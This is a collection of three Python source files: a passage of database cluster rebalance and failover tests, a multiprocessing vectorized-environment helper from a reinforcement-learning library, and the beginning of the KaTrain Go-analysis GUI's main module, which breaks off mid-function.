RebalanceBaseTest.do_kv_and_replica_verification(master,
self.task_manager,
bucket_data,
self.replica,
self)
else:
self.log.info("NO VERIFICATION")
def test_load(self):
self._common_test_body()
class IncrementalRebalanceWithMcsoda(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
#load data add one node , rebalance add another node rebalance, then remove each node
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
# start load, max_ops_per_second is the combined limit for all buckets
buckets = rest.get_buckets()
loaders = []
self.log.info("max-ops-per-second per bucket: {0}".format(self.max_ops_per_second // len(buckets)))
for bucket in buckets:
loader = {}
loader["mcsoda"] = LoadWithMcsoda(master, self.keys_count, prefix='', bucket=bucket.name,
password=bucket.saslPassword, protocol='membase-binary')
loader["mcsoda"].cfg["max-ops"] = 0
loader["mcsoda"].cfg["max-ops-per-sec"] = self.max_ops_per_second // len(buckets)
loader["mcsoda"].cfg["exit-after-creates"] = 0
loader["mcsoda"].cfg["min-value-size"] = self.min_item_size
loader["mcsoda"].cfg["json"] = 0
loader["mcsoda"].cfg["batch"] = 100
loader["thread"] = Thread(target=loader["mcsoda"].load_data, name='mcloader_' + bucket.name)
loader["thread"].daemon = True
loaders.append(loader)
for loader in loaders:
loader["thread"].start()
for iteration in range(self.repeat):
for server in self.servers[1:]:
self.log.info("iteration {0}: ".format(iteration))
self.log.info("current nodes : {0}".format(RebalanceHelper.getOtpNodeIds(master)))
self.log.info("adding node {0} and rebalance afterwards".format(server.ip))
rebalance_done = False
rebalance_try = 0
while not rebalance_done:
try:
ClusterOperationHelper.begin_rebalance_in(master, [server])
ClusterOperationHelper.end_rebalance(master)
rebalance_done = True
except AssertionError as e:
rebalance_try += 1
self.log.error(e)
time.sleep(5)
if rebalance_try > 5:
raise e
for server in self.servers[1:]:
self.log.info("current nodes : {0}".format(RebalanceHelper.getOtpNodeIds(master)))
self.log.info("removing node {0} and rebalance afterwards".format(server.ip))
rebalance_done = False
rebalance_try = 0
while not rebalance_done:
try:
ClusterOperationHelper.begin_rebalance_out(master, [server])
ClusterOperationHelper.end_rebalance(master)
rebalance_done = True
except AssertionError as e:
rebalance_try += 1
self.log.error(e)
time.sleep(5)
if rebalance_try > 5:
raise e
# stop load
for loader in loaders:
loader["mcsoda"].load_stop()
for loader in loaders:
loader["thread"].join()
def test_load(self):
self._common_test_body()
class IncrementalRebalanceOut(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
cluster_size = self.input.param("cluster_size", len(self.servers))
howMany = self.input.param("howMany", cluster_size - 1)
if howMany >= cluster_size:
self.fail(
"Input error! howMany {0} rebalance-outs should be lesser than cluster_size {1}".format(howMany, \
cluster_size))
# add all servers
self.log.info("Rebalancing In with cluster size {0}".format(cluster_size))
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
self.servers[1:cluster_size],
[])
self.log.info("Initial Load with key-count {0}".format(self.keys_count))
RebalanceBaseTest.load_all_buckets_task(rest, self.task_manager,
bucket_data, ram_load_ratio=self.load_ratio,
keys_count=self.keys_count)
while howMany > 0:
if len(rest.node_statuses()) < 2:
break
if self.checkResidentRatio:
self.log.info("Getting the resident ratio stats before failover/rebalancing out the nodes")
RebalanceBaseTest.check_resident_ratio(self, master)
# Never pick master node - The modified function takes care of this one.
rebalanceOutNode = RebalanceHelper.pick_node(master)
self.log.info(
"Incrementally rebalancing out node {0}:{1}".format(rebalanceOutNode.ip, rebalanceOutNode.port))
# rebalance out a server
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
[],
[rebalanceOutNode], do_stop=self.do_stop)
# wait for loading tasks to finish
RebalanceBaseTest.finish_all_bucket_tasks(rest, bucket_data)
self.log.info("Completed Loading and Rebalacing out")
if self.checkResidentRatio:
self.log.info("Getting the resident ratio stats after rebalancing out the nodes")
RebalanceBaseTest.check_resident_ratio(self, master)
# verification step
if self.do_verify:
self.log.info("Verifying with KV store")
RebalanceBaseTest.do_kv_and_replica_verification(master, self.task_manager,
bucket_data, self.replica, self)
else:
self.log.info("No Verification with KV store")
howMany = howMany - 1
def test_load(self):
self._common_test_body()
class StopRebalanceAfterFailoverTests(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
def stop_rebalance(self):
self._common_test_body()
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
creds = self.input.membase_settings
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
ClusterOperationHelper.add_all_nodes_or_assert(master, self.servers, creds, self)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding nodes")
nodes = rest.node_statuses()
#dont rebalance out the current node
while len(nodes) > 1:
#pick a node that is not the master node
toBeEjectedNode = RebalanceHelper.pick_node(master)
distribution = RebalanceBaseTest.get_distribution(self.load_ratio)
RebalanceBaseTest.load_data_for_buckets(rest, self.load_ratio, distribution, [master], bucket_data, self)
self.log.info("current nodes : {0}".format([node.id for node in rest.node_statuses()]))
#let's start/step rebalance three times
self.log.info("removing node {0} and rebalance afterwards".format(toBeEjectedNode.id))
rest.fail_over(toBeEjectedNode.id)
self.log.info("failed over {0}".format(toBeEjectedNode.id))
time.sleep(10)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],
ejectedNodes=[toBeEjectedNode.id])
expected_progress = 30
reached = RestHelper(rest).rebalance_reached(expected_progress)
self.assertTrue(reached, "rebalance failed or did not reach {0}%".format(expected_progress))
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
time.sleep(20)
RebalanceBaseTest.replication_verification(master, bucket_data, self.replica, self)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[toBeEjectedNode.id])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(toBeEjectedNode.id))
time.sleep(20)
RebalanceBaseTest.replication_verification(master, bucket_data, self.replica, self)
nodes = rest.node_statuses()
class IncrementalRebalanceWithParallelReadTests(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
def _common_test_body(self, moxi=False):
master = self.servers[0]
rest = RestConnection(master)
creds = self.input.membase_settings
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
for server in self.servers[1:]:
self.log.info("current nodes : {0}".format(RebalanceHelper.getOtpNodeIds(master)))
self.log.info("adding node {0}:{1} and rebalance afterwards".format(server.ip, server.port))
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster {1}"
self.assertTrue(otpNode, msg.format(server.ip, master.ip))
for name in bucket_data:
inserted_keys, rejected_keys = \
MemcachedClientHelper.load_bucket_and_return_the_keys(servers=[self.servers[0]],
name=name,
ram_load_ratio=-1,
number_of_items=self.keys_count,
number_of_threads=1,
write_only=True)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(server.ip))
self.log.info("completed rebalancing in server {0}".format(server))
IncrementalRebalanceWithParallelReadTests._reader_thread(self, inserted_keys, bucket_data, moxi=moxi)
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(server.ip))
break
@staticmethod
def _reader_thread(self, inserted_keys, bucket_data, moxi=False):
errors = []
rest = RestConnection(self._servers[0])
smartclient = None
for name in bucket_data:
for key in inserted_keys:
if moxi:
moxi = MemcachedClientHelper.proxy_client(self._servers[0], name)
else:
smartclient = VBucketAwareMemcached(rest, name)
try:
if moxi:
moxi.get(key)
else:
smartclient.memcached(key).get(key)
except Exception as ex:
errors.append({"error": ex, "key": key})
self.log.info(ex)
if not moxi:
smartclient.done()
smartclient = VBucketAwareMemcached(rest, name)
def test_10k_moxi(self):
self._common_test_body(moxi=True)
def test_10k_memcached(self):
self._common_test_body()
class FailoverRebalanceRepeatTests(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
#load data add one node , rebalance add another node rebalance
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
creds = self.input.membase_settings
rebalanced_servers = [master]
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
self.log.info("INTIAL LOAD")
RebalanceBaseTest.load_all_buckets_task(rest, self.task_manager, bucket_data, self.load_ratio,
keys_count=self.keys_count)
for name in bucket_data:
for thread in bucket_data[name]["threads"]:
bucket_data[name]["items_inserted_count"] += thread.inserted_keys_count()
for server in self.servers[1:]:
self.log.info("current nodes : {0}".format(RebalanceHelper.getOtpNodeIds(master)))
#do this 2 times , start rebalance , failover the node , remove the node and rebalance
for i in range(0, self.num_rebalance):
distribution = RebalanceBaseTest.get_distribution(self.load_ratio)
RebalanceBaseTest.load_data_for_buckets(rest, self.load_ratio, distribution, [master], bucket_data,
self)
self.log.info("adding node {0} and rebalance afterwards".format(server.ip))
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster {1}"
self.assertTrue(otpNode, msg.format(server.ip, master.ip))
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(server.ip))
rebalanced_servers.append(server)
RebalanceBaseTest.replication_verification(master, bucket_data, self.replica, self, True)
rest.fail_over(otpNode.id)
self.log.info("failed over {0}".format(otpNode.id))
time.sleep(10)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],
ejectedNodes=[otpNode.id])
msg = "rebalance failed while removing failover nodes {0}".format(otpNode.id)
self.assertTrue(rest.monitorRebalance(), msg=msg)
#now verify the numbers again ?
RebalanceBaseTest.replication_verification(master, bucket_data, self.replica, self, True)
#wait 6 minutes
time.sleep(6 * 60)
self.log.info("adding node {0} and rebalance afterwards".format(server.ip))
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster {1}"
self.assertTrue(otpNode, msg.format(server.ip, master.ip))
distribution = RebalanceBaseTest.get_distribution(self.load_ratio)
RebalanceBaseTest.load_data_for_buckets(rest, self.load_ratio, distribution, rebalanced_servers, bucket_data, self)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(server.ip))
rebalanced_servers.append(server)
RebalanceBaseTest.replication_verification(master, bucket_data, self.replica, self, True)
def test_load(self):
self._common_test_body()
class RebalanceInOutWithParallelLoad(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
self.log.info("INTIAL LOAD")
RebalanceBaseTest.load_all_buckets_task(rest, self.task_manager, bucket_data, self.load_ratio,
keys_count=self.keys_count)
rebalance_out = False
for server in self.servers[1:]:
if rebalance_out:
# Pick a node to rebalance out, other than master
ejectedNodes = [RebalanceHelper.pick_node(master)]
else:
ejectedNodes = []
current_nodes = RebalanceHelper.getOtpNodeIds(master)
self.log.info("current nodes : {0}".format(current_nodes))
self.log.info("adding node {0}, removing node {1} and rebalance afterwards".format(server.ip,
[node.ip for node in ejectedNodes]))
self.log.info("START PARALLEL LOAD")
RebalanceBaseTest.tasks_for_buckets(rest, self.task_manager, bucket_data,
DELETE_RATIO=self.delete_ratio,
ACCESS_RATIO=self.access_ratio, EXPIRY_RATIO=self.expiry_ratio)
self.log.info("INCREMENTAL REBALANCE IN/OUT")
# rebalance in/out a server
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
[server],
ejectedNodes, do_stop=self.do_stop)
# wait for loading tasks to finish
RebalanceBaseTest.finish_all_bucket_tasks(rest, bucket_data)
# Make sure we have at least 3 nodes, for replica=2
if len(current_nodes) > 2:
rebalance_out = True
if self.do_verify:
self.log.info("VERIFICATION")
RebalanceBaseTest.do_kv_and_replica_verification(master,
self.task_manager,
bucket_data,
self.replica,
self)
else:
self.log.info("NO VERIFICATION")
def test_load(self):
self._common_test_body()
class RebalanceOutWithFailover(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
# add all servers
self.log.info("Initially rebalancing in the nodes")
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
self.servers[1:],
[], monitor=True, do_stop=self.do_stop)
self.log.info("Initial loading of data")
RebalanceBaseTest.load_all_buckets_task(rest, self.task_manager,
bucket_data, self.load_ratio,
keys_count=self.keys_count)
nodes = rest.node_statuses()
for node in nodes[1:]:
# Get the current cluster size, we will continnue fail-over till current_cluster_size= replica+1
current_cluster_len = len(rest.node_statuses())
if current_cluster_len < (self.replica + 1):
self.log.info(
"Replica count {0} is greater than the current cluster-size{1}, stopping failover test.".format(
self.replica, current_cluster_len))
else:
# Never pick master node
if node.ip != master.ip:
self.log.info("Starting Parallel Load ..")
RebalanceBaseTest.tasks_for_buckets(rest, self.task_manager, bucket_data,
DELETE_RATIO=self.delete_ratio,
ACCESS_RATIO=self.access_ratio, EXPIRY_RATIO=self.expiry_ratio)
# Pick a Node to failover
toBeEjectedNode = RebalanceHelper.pick_node(master)
self.log.info("Starting Failover and Rebalance Out for node {0}:{1}".format(toBeEjectedNode.ip,
toBeEjectedNode.port))
# rebalance Out
RebalanceTaskHelper.add_failover_task(self.task_manager,
[master],
[toBeEjectedNode], True)
self.log.info(
"Completed Failover for node {0}:{1}".format(toBeEjectedNode.ip, toBeEjectedNode.port))
# rebalance Out
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
[],
[toBeEjectedNode], do_stop=self.do_stop, monitor=True)
# wait for all tasks to finish
RebalanceBaseTest.finish_all_bucket_tasks(rest, bucket_data)
self.log.info("Completed Load, Failover and Rebalance Out. ")
# verification step
if self.do_verify:
self.log.info("Verifying with KV-store")
RebalanceBaseTest.do_kv_and_replica_verification(master, self.task_manager,
bucket_data, self.replica, self, failed_over=True)
else:
self.log.info("No verification with KV-store specified")
# at least 2 nodes required per loop to rebalance out and verify replication
self.log.info("Completed Load and Rebalance-Out")
def test_load(self):
self._common_test_body()
class RebalanceTaskHelper():
@staticmethod
def add_rebalance_task(tm, servers, to_add, to_remove, monitor=True,
do_stop=False, progress=30):
_t = task.RebalanceTask(servers, to_add, to_remove, do_stop=do_stop,
progress=progress)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor=monitor)
@staticmethod
def add_failover_task(tm, servers, to_remove, monitor=False):
_t = task.FailOverTask(servers, to_remove)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor)
@staticmethod
def incremental_rebalance_in_tasks(tm, servers, to_add, delay=0):
return [RebalanceTaskHelper.schedule_task_helper(tm, _t, True, delay) for _t in
[task.RebalanceTask(servers, [new_server], []) for new_server in to_add]]
@staticmethod
def incremental_rebalance_out_tasks(tm, servers, to_remove):
return [RebalanceTaskHelper.schedule_task_helper(tm, _t, True) for _t in
[task.RebalanceTask(servers, [], [old_server]) for old_server in to_remove]]
@staticmethod
def add_doc_gen_task(tm, rest, count, bucket="default", kv_store=None, store_enabled=True,
kv_template=None, seed=None, sizes=None, expiration=None,
loop=False, monitor=False, doc_generators=None):
doc_generators = doc_generators or DocumentGenerator.get_doc_generators(count, kv_template, seed, sizes)
_t = task.LoadDocGeneratorTask(rest, doc_generators, bucket=bucket, kv_store=kv_store,
store_enabled=store_enabled, expiration=expiration, loop=loop)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor)
@staticmethod
def add_doc_del_task(tm, rest, keys, bucket="default", info=None,
kv_store=None, store_enabled=True,
monitor=False, delay=0):
_t = task.DocumentDeleteTask(rest, keys, bucket, info, kv_store, store_enabled)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor, delay)
@staticmethod
def add_doc_exp_task(tm, rest, keys, bucket="default", info=None,
kv_store=None, store_enabled=True,
monitor=False, delay=0, expiration=5):
_t = task.DocumentExpireTask(rest, keys, bucket, info, kv_store,
store_enabled, expiration=expiration)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor, delay)
@staticmethod
def add_doc_get_task(tm, rest, keys, bucket="default", info=None,
loop=False, monitor=False, delay=0):
_t = task.DocumentAccessTask(rest, keys, bucket=bucket, info=info, loop=loop)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor, delay)
@staticmethod
def add_kv_integrity_helper(tm, rest, kv_store, bucket="default", monitor=True):
_t = task.KVStoreIntegrityTask(rest, kv_store, bucket)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor)
@staticmethod
def schedule_task_helper(tm, task, monitor=False, delay=0):
tm.schedule(task, delay)
if monitor:
return task.result()
return task
|
multiprocessing_env.py
|
#This code is from openai baseline
#https://github.com/openai/baselines/tree/master/baselines/common/vec_env
import os
import sys
import numpy as np
from itertools import count
from multiprocessing import Process, Pipe
def worker(remote, parent_remote, env_fn_wrapper, render=0, shared=None):
parent_remote.close()
env = env_fn_wrapper.x()
try:
if render and env.spec.id.find('Bullet')>=0:
env.render(mode="human")
except:
pass
if shared is not None and isinstance(shared, dict):
for k,v in shared.items():
setattr(env, k, v)
#~ while True:
for i in count(0):
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
if render and i%10==0:
env.render('human')
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task(data)
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class VecEnv(object):
"""
An abstract asynchronous, vectorized environment.
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
self.step_async(actions)
return self.step_wait()
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None, render=False, shared=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
#~ self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
#~ for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
if not render:
self.ps = [Process(target=worker,
kwargs=dict(remote=work_remote,
parent_remote=remote,
env_fn_wrapper=CloudpickleWrapper(env_fn),
shared=shared,
) )
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
else:
self.ps = [Process(target=worker,
kwargs=dict(remote=work_remote,
parent_remote=remote,
env_fn_wrapper=CloudpickleWrapper(env_fn),
render=(i==0),
shared=shared,
) )
for (work_remote, remote, env_fn, i) in zip(self.work_remotes, self.remotes, env_fns, range(nenvs))]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self, task=None):
for remote in self.remotes:
remote.send(('reset_task', task))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
|
__main__.py
|
"""isort:skip_file"""
# first, logging level lower
import os
os.environ["KCFG_KIVY_LOG_LEVEL"] = os.environ.get("KCFG_KIVY_LOG_LEVEL", "warning")
# if "KIVY_AUDIO" not in os.environ: # trying default again
# os.environ["KIVY_AUDIO"] = "sdl2" # some backends hard crash / this seems to be most stable
import kivy
kivy.require("2.0.0")
# next, icon
from katrain.core.utils import find_package_resource, PATHS
from kivy.config import Config
from kivy.utils import platform
ICON = find_package_resource("katrain/img/icon.ico")
Config.set("kivy", "window_icon", ICON)
Config.set("input", "mouse", "mouse,multitouch_on_demand")
import re
import signal
import json
import sys
import threading
import traceback
from queue import Queue
import urllib3
import webbrowser
import time
import random
import glob
from kivy.base import ExceptionHandler, ExceptionManager
from kivy.app import App
from kivy.core.clipboard import Clipboard
from kivy.lang import Builder
from kivy.resources import resource_add_path
from kivy.uix.popup import Popup
from kivy.uix.screenmanager import Screen
from kivy.core.window import Window
from kivy.uix.widget import Widget
from kivy.resources import resource_find
from kivy.properties import NumericProperty, ObjectProperty, StringProperty
from kivy.clock import Clock
from kivy.metrics import dp
from katrain.core.ai import generate_ai_move
from kivy.utils import platform as kivy_platform
from katrain.core.lang import DEFAULT_LANGUAGE, i18n
from katrain.core.constants import (
OUTPUT_ERROR,
OUTPUT_KATAGO_STDERR,
OUTPUT_INFO,
OUTPUT_DEBUG,
OUTPUT_EXTRA_DEBUG,
MODE_ANALYZE,
HOMEPAGE,
VERSION,
STATUS_ERROR,
STATUS_INFO,
PLAYING_NORMAL,
PLAYER_HUMAN,
SGF_INTERNAL_COMMENTS_MARKER,
MODE_PLAY,
DATA_FOLDER,
AI_DEFAULT,
)
from katrain.gui.popups import (
ConfigTeacherPopup,
ConfigTimerPopup,
I18NPopup,
SaveSGFPopup,
ContributePopup,
EngineRecoveryPopup,
)
from katrain.gui.sound import play_sound
from katrain.core.base_katrain import KaTrainBase
from katrain.core.engine import KataGoEngine
from katrain.core.contribute_engine import KataGoContributeEngine
from katrain.core.game import Game, IllegalMoveException, KaTrainSGF, BaseGame
from katrain.core.sgf_parser import Move, ParseError
from katrain.gui.popups import ConfigPopup, LoadSGFPopup, NewGamePopup, ConfigAIPopup
from katrain.gui.theme import Theme
from kivymd.app import MDApp
# used in kv
from katrain.gui.kivyutils import *
from katrain.gui.widgets import MoveTree, I18NFileBrowser, SelectionSlider, ScoreGraph # noqa F401
from katrain.gui.badukpan import AnalysisControls, BadukPanControls, BadukPanWidget # noqa F401
from katrain.gui.controlspanel import ControlsPanel # noqa F401
class KaTrainGui(Screen, KaTrainBase):
"""Top level class responsible for tying everything together"""
zen = NumericProperty(0)
controls = ObjectProperty(None)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.engine = None
self.contributing = False
self.new_game_popup = None
self.fileselect_popup = None
self.config_popup = None
self.ai_settings_popup = None
self.teacher_settings_popup = None
self.timer_settings_popup = None
self.contribute_popup = None
self.pondering = False
self.animate_contributing = False
self.message_queue = Queue()
self.last_key_down = None
self.last_focus_event = 0
def log(self, message, level=OUTPUT_INFO):
super().log(message, level)
if level == OUTPUT_KATAGO_STDERR and "ERROR" not in self.controls.status.text:
if self.contributing:
self.controls.set_status(message, STATUS_INFO)
elif "starting" in message.lower():
self.controls.set_status("KataGo engine starting...", STATUS_INFO)
elif message.startswith("Tuning"):
self.controls.set_status(
"KataGo is tuning settings for first startup, please wait." + message, STATUS_INFO
)
return
elif "ready" in message.lower():
self.controls.set_status("KataGo engine ready.", STATUS_INFO)
if (
level == OUTPUT_ERROR
or (level == OUTPUT_KATAGO_STDERR and "error" in message.lower() and "tuning" not in message.lower())
) and getattr(self, "controls", None):
self.controls.set_status(f"ERROR: {message}", STATUS_ERROR)
def handle_animations(self, *_args):
if self.contributing and self.animate_contributing:
self.engine.advance_showing_game()
if (self.contributing and self.animate_contributing) or self.pondering:
self.board_controls.engine_status_pondering += 5
else:
self.board_controls.engine_status_pondering = -1
@property
def play_analyze_mode(self):
return self.play_mode.mode
def toggle_continuous_analysis(self):
if self.contributing:
self.animate_contributing = not self.animate_contributing
else:
if self.pondering:
self.controls.set_status("", STATUS_INFO)
self.pondering = not self.pondering
self.update_state()
def start(self):
if self.engine:
return
self.board_gui.trainer_config = self.config("trainer")
self.engine = KataGoEngine(self, self.config("engine"))
threading.Thread(target=self._message_loop_thread, daemon=True).start()
sgf_args = [
f
for f in sys.argv[1:]
if os.path.isfile(f) and any(f.lower().endswith(ext) for ext in ["sgf", "ngf", "gib"])
]
if sgf_args:
self.load_sgf_file(sgf_args[0], fast=True, rewind=True)
else:
self._do_new_game()
Clock.schedule_interval(self.handle_animations, 0.1)
Window.request_keyboard(None, self, "").bind(on_key_down=self._on_keyboard_down, on_key_up=self._on_keyboard_up)
def set_focus_event(*args):
self.last_focus_event = time.time()
MDApp.get_running_app().root_window.bind(focus=set_focus_event)
def update_gui(self, cn, redraw_board=False):
# Handle prisoners and next player display
prisoners = self.game.prisoner_count
top, bot = [w.__self__ for w in self.board_controls.circles] # no weakref
if self.next_player_info.player == "W":
top, bot = bot, top
self.controls.players["W"].active = True
self.controls.players["B"].active = False
else:
self.controls.players["W"].active = False
self.controls.players["B"].active = True
self.board_controls.mid_circles_container.clear_widgets()
self.board_controls.mid_circles_container.add_widget(bot)
self.board_controls.mid_circles_container.add_widget(top)
self.controls.players["W"].captures = prisoners["W"]
self.controls.players["B"].captures = prisoners["B"]
# update engine status dot
if not self.engine or not self.engine.katago_process or self.engine.katago_process.poll() is not None:
self.board_controls.engine_status_col = Theme.ENGINE_DOWN_COLOR
elif self.engine.is_idle():
self.board_controls.engine_status_col = Theme.ENGINE_READY_COLOR
else:
self.board_controls.engine_status_col = Theme.ENGINE_BUSY_COLOR
self.board_controls.queries_remaining = self.engine.queries_remaining()
# redraw board/stones
if redraw_board:
self.board_gui.draw_board()
self.board_gui.redraw_board_contents_trigger()
self.controls.update_evaluation()
self.controls.update_timer(1)
# update move tree
self.controls.move_tree.current_node = self.game.current_node
def update_state(self, redraw_board=False): # redirect to message queue thread
self("update_state", redraw_board=redraw_board)
def _do_update_state(
self, redraw_board=False
): # is called after every message and on receiving analyses and config changes
# AI and Trainer/auto-undo handlers
if not self.game or not self.game.current_node:
return
cn = self.game.current_node
if not self.contributing:
last_player, next_player = self.players_info[cn.player], self.players_info[cn.next_player]
if self.play_analyze_mode == MODE_PLAY and self.nav_drawer.state != "open" and self.popup_open is None:
points_lost = cn.points_lost
if (
last_player.human
and cn.analysis_complete
and points_lost is not None
and points_lost > self.config("trainer/eval_thresholds")[-4]
):
self.play_mistake_sound(cn)
teaching_undo = cn.player and last_player.being_taught and cn.parent
if (
teaching_undo
and cn.analysis_complete
and cn.parent.analysis_complete
and not cn.children
and not self.game.end_result
):
self.game.analyze_undo(cn) # not via message loop
if (
cn.analysis_complete
and next_player.ai
and not cn.children
and not self.game.end_result
and not (teaching_undo and cn.auto_undo is None)
): # cn mismatch stops this if undo fired. avoid message loop here or fires repeatedly.
self._do_ai_move(cn)
Clock.schedule_once(self.board_gui.play_stone_sound, 0.25)
if self.engine:
if self.pondering:
self.game.analyze_extra("ponder")
else:
self.engine.stop_pondering()
Clock.schedule_once(lambda _dt: self.update_gui(cn, redraw_board=redraw_board), -1) # trigger?
def update_player(self, bw, **kwargs):
super().update_player(bw, **kwargs)
if self.game:
sgf_name = self.game.root.get_property("P" + bw)
self.players_info[bw].name = None if not sgf_name or SGF_INTERNAL_COMMENTS_MARKER in sgf_name else sgf_name
if self.controls:
self.controls.update_players()
self.update_state()
for player_setup_block in PlayerSetupBlock.INSTANCES:
player_setup_block.update_player_info(bw, self.players_info[bw])
def set_note(self, note):
self.game.current_node.note = note
# The message loop is here to make sure moves happen in the right order, and slow operations don't hang the GUI
def _message_loop_thread(self):
while True:
game, msg, args, kwargs = self.message_queue.get()
try:
self.log(f"Message Loop Received {msg}: {args} for Game {game}", OUTPUT_EXTRA_DEBUG)
if game != self.game.game_id:
self.log(
f"Message skipped as it is outdated (current game is {self.game.game_id}", OUTPUT_EXTRA_DEBUG
)
continue
msg = msg.replace("-", "_")
if self.contributing:
if msg not in [
"katago_contribute",
"redo",
"undo",
"update_state",
"save_game",
"find_mistake",
]:
self.controls.set_status(
i18n._("gui-locked").format(action=msg), STATUS_INFO, check_level=False
)
continue
fn = getattr(self, f"_do_{msg}")
fn(*args, **kwargs)
if msg != "update_state":
